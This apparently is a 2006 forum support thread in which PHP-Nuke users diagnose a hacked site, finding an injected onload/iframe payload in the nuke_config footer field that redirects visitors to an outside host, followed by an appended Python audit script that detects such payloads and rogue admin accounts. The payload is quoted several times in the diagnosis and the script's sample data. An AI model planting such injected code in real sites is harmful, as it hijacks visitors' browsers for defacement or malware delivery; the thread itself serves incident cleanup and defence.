18-delta
Hangin' Around

Joined: Oct 08, 2003
Posts: 36
Location: U.S.
Posted: Sun Jan 15, 2006 11:36 pm
Raven, long time since I have stopped by. Good to see the site thriving.
I have been hacked and would like any help that anyone can afford. I have been out of the Nuke loop for so long my technical know-how leaves something to be desired, so I have to give a layman's description of what is going on. Hopefully someone will recognize the variant of attack and offer advice.
Description: To me it appears to be some type of redirect hack. When you enter my web address my site will start to load. You can even see the site loading briefly before the browser screen turns into a page that simply says "Hacked?" in large letters in the middle of the screen. If you type in my web address but use modules.php, admin.php, or any other besides index.php, the result is the same. I am able to hit the browser's stop button before the malicious page pops up. When doing so, it will stop the loading of the page and I can see my site. It appears that nothing in the site has been altered, i.e. deleted, added, etc. However, I cannot log in as an admin. Not because the name or password has been changed, but because I am unable to stop the page at precisely the right time so I can see the security numbers so that I can enter them. (The redirect happens too fast.)
I logged in to my administration deck so I could take a peek behind the scenes. Again, I can see nothing SIMPLE that has been altered, such as a new user. I did take a peek at the logs but I don't know what I'm looking for. The good thing is that my logs for each day are very small because my site gets very little traffic.
My best uneducated guess is that they did some type of SQL injection. I don't think they hacked my password and altered things that way.
I am also running a sub-domain which has not been affected and to the best of my knowledge is unaltered. My goal here is to simply restore normalcy to my main domain site. Once I have got that I will probably take it down and rebuild it with something besides Nuke. Not because I don't like Nuke but simply because my hosting service does not provide me the ability to update it (I tried in the past but was unsuccessful). The version I am running on my main domain is older and therefore I am sure has tons of vulnerabilities. My sub-domain I have kept up on updates.
The website link is below. Hopefully my description, and a look for yourself, will be enough for someone to point me in the right direction so I can clean it up and move on. Sorry for not being able to provide more technical descriptors. Like I said, I have been out of the loop for a while and have probably forgotten 70% of what I used to know.
Thanks,
18-delta
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221
Posted: Mon Jan 16, 2006 1:10 am
Hmm, sorry, I don't see anything in that link. Only the webpage index.
18-delta

Posted: Mon Jan 16, 2006 1:24 am
I am messing with it now. Yeah, I'm lost... Please disregard until I can give you guys something more specific.
At this point all I can say is that the index.php in my default directory which points to the installed Nuke has been removed by me. Therefore one cannot see the problem I described above at this time. If you wish to take a look, here is the link:
http://ibryson.com/ipw-web/portal/cms/index.php
I am trying to track it all down.
Thanks for taking a look, evaders99.
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
Posted: Mon Jan 16, 2006 1:32 am
VinDSL

Posted: Mon Jan 16, 2006 1:37 am
VinDSL

Posted: Mon Jan 16, 2006 1:47 am
More clues...
Disabling JavaScript brings up your site just fine!
18-delta

Posted: Mon Jan 16, 2006 1:52 am
OK...??? Somebody hacked the CSS file for the default theme I have for the site?
If so, is this a theme vulnerability or am I looking at a whole 'nother monster?
VinDSL

Posted: Mon Jan 16, 2006 1:57 am
Aha! Bogies at the bottom of your index file...
Code:
<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">
<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">
<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">
VinDSL

Posted: Mon Jan 16, 2006 2:00 am
18-delta wrote:
> OK...??? Somebody hacked the CSS file for the default theme I have for the site?
> If so, is this a theme vulnerability or am I looking at a whole 'nother monster?
Hard to say, but I think the first place I would look is inside my footer code...
18-delta

Posted: Mon Jan 16, 2006 2:05 am
OK, thanks Vin. Not too sure what I'm looking for but I will keep searching through the files.
One mess at a time, LOL.
VinDSL

Posted: Mon Jan 16, 2006 2:08 am
18-delta

Posted: Mon Jan 16, 2006 2:12 am
Vin, where did you pull that code from? I threw my index file into an editor and don't see it anywhere.
VinDSL

Posted: Mon Jan 16, 2006 2:13 am
VinDSL

Posted: Mon Jan 16, 2006 2:15 am
18-delta wrote:
> Vin, where did you pull that code from? I threw my index file into an editor and don't see it anywhere.
How does your (root) 'footer.php' file look? I think I'd check that first...
djmaze
Subject Matter Expert

Joined: May 15, 2004
Posts: 727
Location: http://tinyurl.com/5z8dmv
Posted: Mon Jan 16, 2006 2:23 am
Pff, what a waste of time.
1. Download and install Firefox
2. Install [link not preserved]
3. Disable JavaScript through webdeveloper
4. Admin -> Settings
Or just run the following query
Code:
-- the footer columns in PHP-Nuke's nuke_config are foot1, foot2, foot3 (there is no footer1)
UPDATE nuke_config SET foot1='';
VinDSL

Posted: Mon Jan 16, 2006 2:25 am
djmaze wrote:
> Pff, what a waste of time...
Come on, Cowboy, this is fun!
Quote:
> "Give a man a fish; you have fed him for today. Teach a man to fish; and you have fed him for a lifetime."
18-delta

Posted: Mon Jan 16, 2006 2:31 am
My root footer looks fine.
I already use Firefox, and disabled JavaScript.
VinDSL

Posted: Mon Jan 16, 2006 2:37 am
Probably a SQL injection then...
I think I'd check my `nuke_config` table next. See how your foot fields look, e.g. 'foot1', 'foot2', 'foot3', et cetera...
VinDSL

Posted: Mon Jan 16, 2006 3:03 am
18-delta

Posted: Mon Jan 16, 2006 3:04 am
Found it in foot1.
Man...
So do I just dump the data out of foot1?
I don't know what the original had in it.
More importantly, how can I avoid an injection like this in the future?
Thanks in advance, Vin.
I am heading off to bed and will check back in the morning.
VinDSL

Posted: Mon Jan 16, 2006 3:18 am
18-delta wrote:
> Found it in foot1. Man... So do I just dump the data out of foot1?
Cool!
Well, all that is, as the name implies, is the first line in your footer message. Mine is, like, 'Copyright 1996-2005 Lenon.com All rights reserved', or whatever...
As far as protecting yourself in the future -- I don't know how this Turkish hacker injected the code. What I would do is go through my logs, line by line, and see how he did it -- then close the loophole.
Anyway, glad to see you found the problem!
Latez!
18-delta

Posted: Mon Jan 16, 2006 3:22 am
Cool, thanks man!!
I will scour the logs and post anything I find.
Sincerely, thanks for your time.
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 17088
Posted: Mon Jan 16, 2006 9:51 am
This hack is usually accomplished by them adding an admin to your authors table and possibly a user record too. Be sure to check that out. If you find that is the case, NukeSentinel(tm) easily stops that. Are you using NS?
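An added defensive check, written for this thread and not part of PHP-Nuke or of any post above, that follows VinDSL's advice to inspect the foot1..foot3 fields of nuke_config and Raven's advice to check the authors table: it flags footer fields carrying tags, event handlers or DOM rewriting like the onload/iframe payload found here, and lists admin ids absent from a known-good baseline. Column names follow PHP-Nuke; the sample rows, redirect host and baseline are constructed.

```python
import re

# Constructed sample rows standing in for the output of
#   SELECT foot1, foot2, foot3 FROM nuke_config;   and   SELECT aid, email FROM nuke_authors;
# Column names follow PHP-Nuke; the values and the redirect host are constructed.
SAMPLE_CONFIG = {
    "foot1": ("<body topmargin=0 leftmargin=0 onload=\"document.body.innerHTML="
              "'<iframe width=100% height=100% src=http://redirect.example/></iframe>';\">"),
    "foot2": "Copyright 2006 Example Site. All rights reserved.",
    "foot3": "Page Generation: 0.05 Seconds",
}
SAMPLE_AUTHORS = [{"aid": "God", "email": "admin@example.com"},
                  {"aid": "tk0", "email": "x@example.net"}]
KNOWN_ADMINS = {"God"}  # assumed baseline taken from a clean backup

# Markup that has no business in a plain-text footer line: tags that embed or
# replace content, inline event handlers, javascript: URLs and DOM rewriting.
ACTIVE_CONTENT = re.compile(
    r"<\s*(?:iframe|script|body|object|embed)\b"   # embedding / page-replacing tags
    r"|\bon[a-z]+\s*="                            # onload=, onerror=, ...
    r"|javascript\s*:"                            # javascript: URLs
    r"|document\.(?:body|write|location)",        # DOM rewrite / redirect
    re.IGNORECASE,
)


def audit_config(rows):
    """Map each footer field to the sorted set of active-content tokens it contains."""
    findings = {}
    for field, value in rows.items():
        hits = sorted({m.group(0).lower() for m in ACTIVE_CONTENT.finditer(value)})
        if hits:
            findings[field] = hits
    return findings


def audit_authors(rows, baseline):
    """Return admin ids present in nuke_authors but absent from the known-good baseline."""
    return sorted(r["aid"] for r in rows if r["aid"] not in baseline)


if __name__ == "__main__":
    for field, hits in audit_config(SAMPLE_CONFIG).items():
        print(f"{field}: active content found -> {', '.join(hits)}")
    for aid in audit_authors(SAMPLE_AUTHORS, KNOWN_ADMINS):
        print(f"nuke_authors: unexpected admin account '{aid}'")
```

Run it against a dump of the real tables after a cleanup too: a footer field that comes back clean and an authors list matching the baseline is the quickest confirmation that both places Raven and VinDSL named are back to normal.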